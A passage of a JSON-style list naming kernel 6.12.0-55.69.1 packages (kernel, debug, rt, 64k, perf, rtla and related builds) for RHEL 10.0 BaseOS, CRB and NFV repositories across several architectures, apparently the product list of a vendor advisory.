"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
